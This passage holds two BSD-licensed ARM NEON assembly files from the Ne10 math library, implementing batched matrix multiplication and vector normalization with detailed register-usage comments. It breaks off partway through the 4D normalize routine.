open-vela/external_Ne10 | 18,322 | modules/math/NE10_mulmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mulmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mulmat_2x2f_neon
.thumb
.thumb_func
ne10_mulmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Per-element 2x2 matrix product: dst[i] = src1[i] * src2[i].
@
@ arm_result_t ne10_mulmat_2x2f(arm_mat2x2f_t * dst,
@                 arm_mat2x2f_t * src1,
@                 arm_mat2x2f_t * src2,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r4: the number of items that are left to be processed at the end of
@                   the input array
@
@ Returns NE10_OK (0) in r0.
@ NEON clobbers: q0-q3, d16-d19 (all caller-saved under AAPCS).
@
@ The loop is software-pipelined: loads for set N+1 overlap with the
@ multiply of set N, and the store of set N happens at the top of the
@ next iteration.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; remainder handled after the main loop
cmp r3, #0
beq .L_check_mat2x2
@ We load four 2x2 matrices at a time (two per vld4 pair), multiply
@ them pairwise, store the two resulting 2x2 matrices, and move on.
@ vld4 de-interleaves, so each dN holds the same element of 2 matrices.
@ load the 1st set of values
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
subs r3, r3, #4 @ 2 for this set, and 2 for the 2nd set
@ calculate values for the 1st set (column-major 2x2 product)
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ load the 2nd set of values
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for the previous set
vst4.32 { d16, d17, d18, d19}, [r0]!
@ calculate values for the current set
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ load the next set of values
subs r3, r3, #2
vld4.32 { d0, d1, d2, d3 }, [r1]!
vld4.32 { d4, d5, d6, d7 }, [r2]!
bgt .L_mainloop_mat2x2 @ loop while r3 > 0, i.e. at least another 2 matrices to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the set before the last one
vst4.32 { d16, d17, d18, d19}, [r0]!
@ calculate values for the last set
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
@ store the result for the last set
vst4.32 { d16, d17, d18, d19}, [r0]!
.L_check_mat2x2:
@ check if anything is left to process at the end of the input array
cmp r4, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last (count % 4) matrices one at a time (lane 0 only)
vld4.32 { d0[0], d1[0], d2[0], d3[0] }, [r1]!
vld4.32 { d4[0], d5[0], d6[0], d7[0] }, [r2]!
subs r4, r4, #1
@ calculate values
vmul.f32 d16, d0, d4
vmul.f32 d17, d1, d4
vmul.f32 d18, d0, d6
vmul.f32 d19, d1, d6
vmla.f32 d16, d2, d5
vmla.f32 d17, d3, d5
vmla.f32 d18, d2, d7
vmla.f32 d19, d3, d7
vst4.32 { d16[0], d17[0], d18[0], d19[0] }, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return NE10_OK
pop {r4}
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load four 3x3 matrices: two from src1 (r1) and two from
@ src2 (r2). r1 and r2 are post-incremented past the loaded data.
@ The 2x9 floats from src1 land in q0-q3 + d8; those from src2 land
@ in q8-q11 + d9. The vtrn pass re-pairs the lanes so that matching
@ elements of the two matrices from one source share a d register.
@ NOTE(review): d8/d9 (q4) are AAPCS callee-saved — callers of this
@ macro must vpush them, as ne10_mulmat_3x3f_neon does.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_3x3MATS
# load two 3x3 matrices (18 floats) from src1
vld1.32 { q0-q1 }, [r1]!
vld1.32 { d8[0] }, [r1]!
vld1.32 { q2-q3 }, [r1]!
vld1.32 { d8[1] }, [r1]!
# load two 3x3 matrices (18 floats) from src2
vld1.32 { q8-q9 }, [r2]!
vld1.32 { d9[0] }, [r2]!
vld1.32 { q10-q11 }, [r2]!
vld1.32 { d9[1] }, [r2]!
# re-pair lanes of the two matrices from each source
vtrn.32 q0, q2
vtrn.32 q1, q3
vtrn.32 q8, q10
vtrn.32 q9, q11
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Multiplies the two pairs of 3x3 matrices loaded by LOAD_3x3MATS
@ (inputs in q0-q3, d8 and q8-q11, d9). The two resulting matrices
@ are returned in q12-q15 and d10.
@ NOTE(review): d10 (low half of q5) is AAPCS callee-saved — callers
@ must vpush it, as ne10_mulmat_3x3f_neon does.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MULTIPLY_3x3MATS
@ Register map — each dN holds one matrix element from both matrices
@ of a pair (lane 0 = first matrix, lane 1 = second):
@   a = d0 & d16
@   b = d4 & d20
@   c = d1 & d17
@   d = d5 & d21
@   e = d2 & d18
@   f = d6 & d22
@   g = d3 & d19
@   h = d7 & d23
@   i = d8 & d9
@ first partial products of the 3x3 product
vmul.f32 d24, d0, d16
vmul.f32 d28, d4, d16
vmul.f32 d25, d1, d16
vmul.f32 d29, d0, d21
vmul.f32 d26, d4, d21
vmul.f32 d30, d1, d21
vmul.f32 d27, d0, d19
vmul.f32 d31, d4, d19
vmul.f32 d10, d1, d19
@ accumulate second partial products
vmla.f32 d24, d5, d20
vmla.f32 d28, d2, d20
vmla.f32 d25, d6, d20
vmla.f32 d29, d5, d18
vmla.f32 d26, d2, d18
vmla.f32 d30, d6, d18
vmla.f32 d27, d5, d23
vmla.f32 d31, d2, d23
vmla.f32 d10, d6, d23
@ accumulate third partial products
vmla.f32 d24, d3, d17
vmla.f32 d28, d7, d17
vmla.f32 d25, d8, d17
vmla.f32 d29, d3, d22
vmla.f32 d26, d7, d22
vmla.f32 d30, d8, d22
vmla.f32 d27, d3, d9
vmla.f32 d31, d7, d9
vmla.f32 d10, d8, d9
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Stores the two resulting 3x3 matrices produced by MULTIPLY_3x3MATS
@ (q12-q15 and d10) to dst (r0), post-incrementing r0 past the
@ 18 floats written. The vtrn pass undoes the lane pairing done by
@ LOAD_3x3MATS before the matrices are written out contiguously.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_3x3MATS
# un-pair the lanes of the two result matrices
vtrn.32 q12, q14
vtrn.32 q13, q15
# store two 3x3 matrices (18 floats) to dst
vst1.32 { q12-q13 }, [r0]!
vst1.32 { d10[0] }, [r0]!
vst1.32 { q14-q15 }, [r0]!
vst1.32 { d10[1] }, [r0]!
.endm
.align 2
.global ne10_mulmat_3x3f_neon
.thumb
.thumb_func
ne10_mulmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Per-element 3x3 matrix product: dst[i] = src1[i] * src2[i].
@
@ arm_result_t ne10_mulmat_3x3f(arm_mat3x3f_t * dst,
@                 arm_mat3x3f_t * src1,
@                 arm_mat3x3f_t * src2,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r4: the number of items that are left to be processed at the end of
@                   the input array
@
@ Returns NE10_OK (0) in r0.
@ Saves/restores d8-d10, which the LOAD/MULTIPLY macros clobber and
@ AAPCS requires callees to preserve. Other NEON clobbers (q0-q3,
@ q8-q15) are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push { r4 }
vpush { d8, d9, d10 }
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; remainder handled after the main loop
cmp r3, #0
beq .L_check_mat3x3
@ Software-pipelined: each LOAD_3x3MATS brings in 2 matrices from each
@ source; the store of set N happens at the top of the next iteration.
@ load the 1st set of values
LOAD_3x3MATS
subs r3, r3, #4 @ 2 for this set, and 2 for the 2nd set
@ calculate values for the 1st set
MULTIPLY_3x3MATS
@ load the 2nd set of values
LOAD_3x3MATS
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result for the previous set
STORE_3x3MATS
@ calculate values for the current set
MULTIPLY_3x3MATS
@ load the next set of values
LOAD_3x3MATS
subs r3, r3, #2
bgt .L_mainloop_mat3x3 @ loop while r3 > 0, i.e. at least another 2 matrices to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the set before the last one
STORE_3x3MATS
@ calculate values for the last set
MULTIPLY_3x3MATS
@ store the result for the last set
STORE_3x3MATS
.L_check_mat3x3:
@ check if anything is left to process at the end of the input array
cmp r4, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last (count % 4) matrices one pair-slot at a time:
@ only one matrix from each source is loaded; the other lane of each
@ register keeps stale data, and only the first matrix's 9 floats are
@ stored below, so the stale lanes never reach memory.
vld1.32 { q0-q1 }, [r1]!
vld1.32 { d8[0] }, [r1]!
vld1.32 { q8-q9 }, [r2]!
vld1.32 { d9[0] }, [r2]!
vtrn.32 q0, q2
vtrn.32 q1, q3
vtrn.32 q8, q10
vtrn.32 q9, q11
subs r4, r4, #1
@ calculate values for this matrix
MULTIPLY_3x3MATS
@ store the result for this matrix (first result lane only)
vtrn.32 q12, q14
vtrn.32 q13, q15
vst1.32 { q12-q13 }, [r0]!
vst1.32 { d10[0] }, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ restore callee-saved VFP registers and return NE10_OK
vpop { d8, d9, d10 }
pop { r4 }
mov r0, #0
bx lr
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ A macro to load one 4x4 matrix from src1 (r1) into q8-q11 and one
@ from src2 (r2) into q0-q3 (one column per q register). r1 and r2
@ are post-incremented past the 16 floats each. Despite the plural
@ name, only a single pair of matrices is loaded per invocation.
@ Uses only caller-saved NEON registers.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro LOAD_4x4MATS
# load a 4x4 matrix (16 floats) from src1
vld1.32 { q8-q9 }, [r1]!
vld1.32 {q10-q11}, [r1]!
# load a 4x4 matrix (16 floats) from src2
vld1.32 {q0-q1}, [r2]!
vld1.32 {q2-q3}, [r2]!
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Multiplies the two 4x4 matrices loaded by LOAD_4x4MATS and returns
@ the result in q12-q15 (one column per q register). Each result
@ column is built as a linear combination of src1's columns (q8-q11)
@ weighted by the scalar lanes of src2's columns (q0-q3).
@ Uses only caller-saved NEON registers.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro MULTIPLY_4x4MATS
@ result col j  = src1 col0 * src2[0][j]
vmul.f32 q12, q8, d0[0]
vmul.f32 q13, q8, d2[0]
vmul.f32 q14, q8, d4[0]
vmul.f32 q15, q8, d6[0]
@              += src1 col1 * src2[1][j]
vmla.f32 q12, q9, d0[1]
vmla.f32 q13, q9, d2[1]
vmla.f32 q14, q9, d4[1]
vmla.f32 q15, q9, d6[1]
@              += src1 col2 * src2[2][j]
vmla.f32 q12, q10, d1[0]
vmla.f32 q13, q10, d3[0]
vmla.f32 q14, q10, d5[0]
vmla.f32 q15, q10, d7[0]
@              += src1 col3 * src2[3][j]
vmla.f32 q12, q11, d1[1]
vmla.f32 q13, q11, d3[1]
vmla.f32 q14, q11, d5[1]
vmla.f32 q15, q11, d7[1]
.endm
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ Stores the single 4x4 result matrix produced by MULTIPLY_4x4MATS
@ (registers q12-q15) to dst (r0), post-incrementing r0 past the
@ 16 floats written.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.macro STORE_4x4MATS
# store one 4x4 matrix (16 floats) to dst
vst1.32 { q12-q13 }, [r0]!
vst1.32 { q14-q15 }, [r0]!
.endm
.align 2
.global ne10_mulmat_4x4f_neon
.thumb
.thumb_func
ne10_mulmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Per-element 4x4 matrix product: dst[i] = src1[i] * src2[i].
@
@ arm_result_t ne10_mulmat_4x4f(arm_mat4x4f_t * dst,
@                 arm_mat4x4f_t * src1,
@                 arm_mat4x4f_t * src2,
@                 unsigned int count)
@
@  r0: *dst & current dst entry's address
@  r1: *src1 & current src1 entry's address
@  r2: *src2 & current src2 entry's address
@  r3: int count & the number of items in the input array that can be
@                   processed in chunks of 4 matrices
@
@  r4: the number of items that are left to be processed at the end of
@                   the input array
@
@ Returns NE10_OK (0) in r0.
@ NEON clobbers: q0-q3, q8-q15 (all caller-saved under AAPCS;
@ d8-d15 are untouched, so nothing needs vpush here).
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4}
and r4, r3, #3 @ r4 = count % 4;
sub r3, r3, r4 @ count = count - r4; remainder handled after the main loop
cmp r3, #0
beq .L_check_mat4x4
@ Software-pipelined: each LOAD_4x4MATS brings in one matrix from each
@ source; the store of set N happens at the top of the next iteration.
@ load the 1st set of values
LOAD_4x4MATS
subs r3, r3, #2 @ 1 for this set, and 1 for the 2nd set
@ calculate values for the 1st set
MULTIPLY_4x4MATS
@ load the 2nd set of values
LOAD_4x4MATS
ble .L_mainloopend_mat4x4
.L_mainloop_mat4x4:
@ store the result for the previous set
STORE_4x4MATS
@ calculate values for the current set
MULTIPLY_4x4MATS
@ load the next set of values
subs r3, r3, #1
LOAD_4x4MATS
bgt .L_mainloop_mat4x4 @ loop while r3 > 0, i.e. at least another matrix to process
.L_mainloopend_mat4x4:
@ the last iteration for this call
@ store the result for the set before the last one
STORE_4x4MATS
@ calculate values for the last set
MULTIPLY_4x4MATS
@ store the result for the last set
STORE_4x4MATS
.L_check_mat4x4:
@ check if anything is left to process at the end of the input array
cmp r4, #0
ble .L_return_mat4x4
.L_secondloop_mat4x4:
@ process the last (count % 4) matrices one at a time
LOAD_4x4MATS
subs r4, r4, #1
@ calculate values
MULTIPLY_4x4MATS
@ store the result
STORE_4x4MATS
bgt .L_secondloop_mat4x4
.L_return_mat4x4:
@ return NE10_OK
pop {r4}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 14,715 | modules/math/NE10_normalize.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_normalize.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_normalize_vec2f_neon
.thumb
.thumb_func
ne10_normalize_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Normalizes an array of 2D vectors using a Newton-Raphson-refined
@ vrsqrte reciprocal square root estimate.
@
@ arm_result_t ne10_normalize_vec2f(arm_vec2f_t * dst,
@                 arm_vec2f_t * src,
@                 unsigned int count);
@
@  r0: *dst & the current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                  processed in chunks of 4 vectors
@  r3: the number of items that are left to be processed at the end of
@                  the input array
@
@ Returns NE10_OK (0) in r0.
@ Fix vs. original: q4 (d8-d9) is callee-saved under AAPCS but was
@ clobbered without being preserved; it is now saved with vpush/vpop
@ (same convention as ne10_mulmat_3x3f_neon in this library).
@ Remaining NEON clobbers (q0-q3, q10-q11) are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
vpush {d8, d9} @ preserve callee-saved q4
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; remainder handled after the main loop
cbz r2, .L_check_vec2
@ load values for the first iteration (vld2 de-interleaves x into q0, y into q1)
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ calculate sum of squares of the components
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ stash the current vectors and load the next set
vmov.f32 q10, q0
vmov.f32 q11, q1
vld2.32 {q0-q1}, [r1]!
subs r2, r2, #4
@ reciprocal sqrt of the previous sums (one Newton-Raphson step)
vrsqrte.f32 q3, q2
vmul.f32 q4, q2, q3
vrsqrts.f32 q4, q4, q3
vmul.f32 q4, q3, q4
@ normalize the components
vmul.f32 q3, q10, q4 @ q3 = x * 1/len
vmul.f32 q4, q11, q4 @ q4 = y * 1/len
vst2.32 {d6,d7,d8,d9}, [r0]!
@ calculate sum of squares for the newly loaded set
vmul.f32 q2, q0, q0
vmla.f32 q2, q1, q1
bgt .L_mainloop_vec2 @ loop while r2 > 0, i.e. at least another 4 vectors (8 floats) remain
.L_mainloopend_vec2:
@ the last iteration for this call
@ reciprocal sqrt of the last sums (one Newton-Raphson step)
vrsqrte.f32 q3, q2
vmul.f32 q4, q2, q3
vrsqrts.f32 q4, q4, q3
vmul.f32 q4, q3, q4
@ normalize the components
vmul.f32 q3, q0, q4 @ q3 = x * 1/len
vmul.f32 q4, q1, q4 @ q4 = y * 1/len
vst2.32 {d6,d7,d8,d9}, [r0]!
.L_check_vec2:
@ check if anything is left to process at the end of the input array
cmp r3, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last (count % 4) vectors one at a time
vld1.f32 d0, [r1]! @ d0 = { V.x, V.y };
subs r3, r3, #1
@ calculate sum of squares of the components
vmul.f32 d1, d0, d0 @ d1 = { V.x^2, V.y^2 };
vpadd.f32 d3, d1, d1 @ d3 = { V.x^2 + V.y^2, V.y^2 + V.x^2 };
@ reciprocal sqrt (one Newton-Raphson step)
vrsqrte.f32 d2, d3
vmul.f32 d1, d3, d2
vrsqrts.f32 d1, d1, d2
vmul.f32 d1, d2, d1
@ normalize the components
vmul.f32 d0, d0, d1
vst1.32 {d0}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ restore callee-saved q4 and return NE10_OK
vpop {d8, d9}
mov r0, #0
bx lr
.align 2
.global ne10_normalize_vec3f_neon
.thumb
.thumb_func
ne10_normalize_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Normalizes an array of 3D vectors using a Newton-Raphson-refined
@ vrsqrte reciprocal square root estimate.
@
@ arm_result_t ne10_normalize_vec3f(arm_vec3t_t * dst,
@                 arm_vec3f_t * src,
@                 unsigned int count);
@
@  r0: *dst & the current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                  processed in chunks of 4 vectors
@  r3: the number of items that are left to be processed at the end of
@                  the input array
@
@ Returns NE10_OK (0) in r0.
@ Fix vs. original: q4-q7 (d8-d15) are callee-saved under AAPCS but
@ were clobbered without being preserved; they are now saved with
@ vpush/vpop (same convention as ne10_mulmat_3x3f_neon). Remaining
@ NEON clobbers (q0-q3, q10-q12) are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
vpush {d8-d15} @ preserve callee-saved q4-q7
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; remainder handled after the main loop
cmp r2, #0
beq .L_check_vec3
@ load values for the first iteration (vld3 de-interleaves x/y/z into q0-q2)
vld3.32 {d0, d2, d4}, [r1]!
vld3.32 {d1, d3, d5}, [r1]!
subs r2, r2, #4
@ calculate sum of squares of the components
vmul.f32 q3, q0, q0
vmla.f32 q3, q1, q1
vmla.f32 q3, q2, q2
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ stash the current vectors and load the next set
vmov.f32 q10, q0
vmov.f32 q11, q1
vmov.f32 q12, q2
vld3.32 {d0,d2,d4}, [r1]!
vld3.32 {d1,d3,d5}, [r1]!
subs r2, r2, #4
@ reciprocal sqrt of the previous sums (one Newton-Raphson step)
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q5, q10, q4
vmul.f32 q6, q11, q4
vmul.f32 q7, q12, q4
vst3.32 {d10, d12, d14}, [r0]!
vst3.32 {d11, d13, d15}, [r0]!
@ calculate sum of squares for the newly loaded set
vmul.f32 q3, q0, q0
vmla.f32 q3, q1, q1
vmla.f32 q3, q2, q2
bgt .L_mainloop_vec3 @ loop while r2 > 0, i.e. at least another 4 vectors (12 floats) remain
.L_mainloopend_vec3:
@ the last iteration for this call
@ reciprocal sqrt of the last sums (one Newton-Raphson step)
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q5, q0, q4
vmul.f32 q6, q1, q4
vmul.f32 q7, q2, q4
vst3.32 {d10, d12, d14}, [r0]!
vst3.32 {d11, d13, d15}, [r0]!
.L_check_vec3:
@ check if anything is left to process at the end of the input array
cmp r3, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last (count % 4) vectors one at a time
vld3.f32 {d0[0], d2[0], d4[0]}, [r1]! @ q0 = { V.x, -, -, - };
@ q1 = { V.y, -, -, - };
@ q2 = { V.z, -, -, - };
subs r3, r3, #1
@ calculate sum of squares of the components
vmul.f32 q3, q0, q0 @ V.x^2
vmla.f32 q3, q1, q1 @ V.x^2 + V.y^2
vmla.f32 q3, q2, q2 @ V.x^2 + V.y^2 + V.z^2
@ reciprocal sqrt (one Newton-Raphson step)
vrsqrte.f32 q5, q3
vmul.f32 q4, q3, q5
vrsqrts.f32 q4, q4, q5
vmul.f32 q4, q5, q4
@ normalize the components
vmul.f32 q0, q0, q4
vmul.f32 q1, q1, q4
vmul.f32 q2, q2, q4
vst3.32 {d0[0], d2[0], d4[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ restore callee-saved q4-q7 and return NE10_OK
vpop {d8-d15}
mov r0, #0
bx lr
.align 2
.global ne10_normalize_vec4f_neon
.thumb
.thumb_func
ne10_normalize_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ Normalizes an array of 4D vectors using a Newton-Raphson-refined
@ vrsqrte reciprocal square root estimate.
@
@ arm_result_t ne10_normalize_vec4f(arm_vec4f_t * dst,
@                 arm_vec4f_t * src,
@                 unsigned int count);
@
@  r0: *dst & the current dst entry's address
@  r1: *src & current src entry's address
@  r2: int count & the number of items in the input array that can be
@                  processed in chunks of 4 vectors
@  r3: the number of items that are left to be processed at the end of
@                  the input array
@
@ Returns NE10_OK (0) in r0.
@ Fix vs. original: q4-q6 (d8-d13) are callee-saved under AAPCS but
@ were clobbered without being preserved; they are now saved with
@ vpush/vpop (same convention as ne10_mulmat_3x3f_neon). Remaining
@ NEON clobbers (q0-q3, q10-q13) are caller-saved.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
vpush {d8-d13} @ preserve callee-saved q4-q6
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; remainder handled after the main loop
cmp r2, #0
beq .L_check_vec4
@ load values for the first iteration (vld4 de-interleaves x/y/z/w into q0-q3)
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate sum of squares of the components
vmul.f32 q5, q0, q0
vmla.f32 q5, q1, q1
vmla.f32 q5, q2, q2
vmla.f32 q5, q3, q3
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ stash the current vectors and load the next set
vmov q10, q0
vmov q11, q1
vmov q12, q2
vmov q13, q3
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ reciprocal sqrt of the previous sums (one Newton-Raphson step)
vrsqrte.f32 q6, q5
vmul.f32 q4, q5, q6
vrsqrts.f32 q4, q4, q6
vmul.f32 q4, q6, q4
@ normalize the components
vmul.f32 q10, q10, q4
vmul.f32 q11, q11, q4
vmul.f32 q12, q12, q4
vmul.f32 q13, q13, q4
vst4.32 {d20, d22, d24, d26}, [r0]!
vst4.32 {d21, d23, d25, d27}, [r0]!
@ calculate sum of squares for the newly loaded set
vmul.f32 q5, q0, q0
vmla.f32 q5, q1, q1
vmla.f32 q5, q2, q2
